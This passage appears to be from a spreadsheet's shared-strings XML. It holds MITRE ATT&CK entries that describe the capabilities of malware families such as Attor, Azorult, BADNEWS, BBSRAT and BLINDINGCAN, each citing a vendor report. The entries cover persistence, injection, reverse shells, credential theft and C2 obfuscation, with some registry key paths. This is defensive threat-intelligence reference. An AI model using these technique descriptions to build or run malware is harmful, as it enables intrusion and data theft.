  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects information about inserted storage devices, modems, and phone devices.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can inject itself into running processes to gain higher privileges and to evade detection.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s has a plugin that captures screenshots of the target applications.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438) has manipulated the time of last access to files and registry keys after they have been created or modified.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence by registering a new service.(Citation: ESET Attor Oct 2019)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) uses XOR and RC4 to perform decryption on the code functions.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can delete files from the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can search through folders and files on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can download files and additional malware.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) encrypts the configuration.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can inject code from files to other running processes.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can utilize proxy for communications.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) can open a reverse shell on the system to execute commands.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AuditCred](https://attack.mitre.org/software/S0347) is installed as a new service on the system.(Citation: TrendMicro Lazarus Nov 2018)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) attempts to escalate privileges by bypassing User Access Control.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) downloads a PowerShell script that decodes to a typical shellcode loader.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) has sent a C2 response that was base64-encoded.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to decrypt files downloaded from C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) </t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to download files from C2 to a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to XOR encrypt files to be sent to C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to identify running processes.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify installed anti-virus products on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can extract backdoor malware from downloaded images.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Avenger](https://attack.mitre.org/software/S0473) has the ability to use HTTP in communication with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can steal credentials from the victim's browser.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) uses an XOR key to decrypt content and uses Base64 to decode the C2 address.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can delete files from victim machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can recursively search for files in folders and collects files from the desktop with certain extensions.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can download and execute additional files. [Azorult](https://attack.mitre.org/software/S0344) has also downloaded a ransomware payload called Hermes.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect a list of running processes by calling CreateToolhelp32Snapshot.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can check for installed software on the system under the Registry key &lt;code&gt;Software\Microsoft\Windows\CurrentVersion\Uninstall&lt;/code&gt;.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can capture screenshots of the victim’s machines.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can encrypt C2 traffic using XOR.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect host IP information from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the username from the victim’s machine.(Citation: Unit42 Azorult Nov 2018)</t>
  </si>
  <si>
    <t>[Azorult](https://attack.mitre.org/software/S0344) can collect the time zone information from the system.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)</t>
  </si>
  <si>
    <t>Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>The "ZR" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) will check to see if known host-based firewalls are installed on the infected systems. [BACKSPACE](https://attack.mitre.org/software/S0031) will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to upload files to the C2 Server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) allows adversaries to search for files.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>The "ZJ" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) allows "ZJ link" infections with Internet access to relay traffic from "ZJ listen" to a command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of deleting Registry keys, sub-keys, and values on a victim system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs "louder" interactions with the malware.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>Newer variants of [BACKSPACE](https://attack.mitre.org/software/S0031) will encode C2 communications with a custom system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) may collect information about running processes.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) is capable of enumerating and making modifications to an infected system's Registry.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>During its initial execution, [BACKSPACE](https://attack.mitre.org/software/S0031) extracts operating system information from the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BACKSPACE](https://attack.mitre.org/software/S0031) uses HTTP as a transport to communicate with its command server.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to execute from the command line on infected hosts, or have [BACKSPACE](https://attack.mitre.org/software/S0031) create a reverse shell.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) disables the Windows firewall before binding to a port.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) modifies the firewall Registry key &lt;code&gt;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List&lt;/code&gt;.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) communicates on ports 443 and 8000 with a FakeTLS method.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) uses a FakeTLS method during C2.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) functions as a proxy server between the victim and C2 server.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) encrypts C2 traffic using an XOR/ADD cipher.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the computer name and host name on the compromised system.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADCALL](https://attack.mitre.org/software/S0245) collects the network adapter information.(Citation: US-CERT BADCALL)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) monitors USB devices and copies files with certain extensions to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) typically loads its DLL file into a legitimate signed Java or VMware executable.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>After encrypting C2 data, [BADNEWS](https://attack.mitre.org/software/S0128) converts it into a hexadecimal representation and then encodes it into base64.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies files with certain extensions from USB devices to
a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) collects C2 information via a dead drop resolver.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) identifies files with certain extensions from USB devices, then copies them to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of downloading additional files through C2 channels, including a new version of itself.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Invalid Code Signature</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>When it first starts, [BADNEWS](https://attack.mitre.org/software/S0128) spawns a new thread to log keystrokes.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) copies documents under 15MB found on the victim system to is the user's &lt;code&gt;%temp%\SMB\&lt;/code&gt; folder. It also copies files from USB devices to a predefined directory.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Match Legitimate Name or Location</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) attempts to hide its payloads using legitimate filenames.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to download an .exe and use process hollowing to inject it into a new process.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) installs a registry Run key to establish persistence.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) creates a scheduled task to establish by executing a malicious payload every subsequent minute.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) has a command to take a screenshot and send it to the C2 server.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encodes C2 traffic with base64.(Citation: Forcepoint Monsoon)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) encrypts C2 data with a ROR by 3 and an XOR by 0x23.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) establishes a backdoor over HTTP.(Citation: PaloAlto Patchwork Mar 2018)</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is capable of executing commands via cmd.exe.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to decrypt AES encrypted payloads.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to download files from C2 to the infected host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use the &lt;code&gt;CreatePipe&lt;/code&gt; API to add a sub-process for execution via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to inject shellcode into svchost.exe.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use HTTP in communications with C2.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BBK](https://attack.mitre.org/software/S0470) has the ability to use [cmd](https://attack.mitre.org/software/S0106) to run a Portable Executable (PE) on the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>Archive via Library</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can compress data with ZLIB prior to sending it back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList &lt;code&gt;{42aedc87-2188-41fd-b9a3-0c966feabec1}&lt;/code&gt; or Microsoft WBEM New Event Subsystem &lt;code&gt;{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}&lt;/code&gt; depending on the system's CPU architecture.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>DLL side-loading has been used to execute [BBSRAT](https://attack.mitre.org/software/S0127) through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with [BBSRAT](https://attack.mitre.org/software/S0127) by the dropper.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses [Expand](https://attack.mitre.org/software/S0361) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can delete files and directories.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list file and directory information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can list running processes.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been seen loaded into msiexec.exe through process hollowing to hide its execution.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe&lt;/code&gt;.</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can start, stop, or delete services.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses a custom encryption algorithm on data sent back to the C2 server over HTTP.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can query service configuration information.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) can modify service configurations.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) uses SSL for encrypting C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) malware contains a secondary fallback command and control server that is contacted after the primary command and control server.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to download a file from the C2 server.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) can capture keystrokes.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to enumerate running processes and identify their owners.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to periodically take screenshots of the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to gather the username from the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) has a command to launch a command shell on the system.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to launch a malicious process.(Citation: TrendMicro Tropic Trooper Mar 2018)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload files from a compromised host.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.(Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files from SMB file servers.(Citation: Microsoft About BITS)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has also obfuscated its C2 traffic as normal traffic to sites such as Github.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.(Citation: FireEye APT17)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to delete files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to discover processes.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to create a reverse shell.(Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been signed with code-signing certificates such as CodeRipper.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [BLINDINGCAN](https://attack.mitre.org/software/S0520) has uploaded files from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used AES and XOR to decrypt its DLLs.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has sent user and system information to a C2 server via HTTP POST requests.(Citation: NHS UK BLINDINGCAN Aug 2020)(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has deleted itself and associated artifacts from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) can search, read, write, move, and execute files.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has downloaded files to a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has lured victims into executing malicious macros embedded within Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has attempted to hide its payload by using legitimate file names such as "iconcache.db".(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has obfuscated code using Base64 encoding.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used Rundll32 to load a malicious DLL.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has loaded and executed DLLs in memory during runtime on a victim machine.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been packed with the UPX packer.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been delivered by phishing emails containing malicious Microsoft Office documents.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encoded its C2 traffic with Base64.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encrypted its C2 traffic with RC4.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
